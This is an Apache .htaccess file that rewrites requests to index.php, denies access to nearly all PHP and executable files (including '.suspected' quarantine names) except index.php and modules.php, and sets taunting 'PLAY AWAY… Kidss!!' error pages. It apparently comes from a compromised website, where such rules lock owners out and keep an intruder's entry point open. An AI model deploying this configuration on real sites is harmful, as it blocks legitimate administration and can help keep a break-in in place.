<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|php6|suspected)$">
Order Allow,Deny
Deny from all
</FilesMatch>
<FilesMatch "^(index.php|index.html|modules.php)$">
Order Allow,Deny
Allow from all
</FilesMatch>
ErrorDocument 404 "<title>PLAY AWAY.</title><center><pre>404 Not Found Kidss!!</pre></center>"
ErrorDocument 403 "<title>PLAY AWAY.</title><center><pre>403 Forbidden Kidss!!</pre></center>"
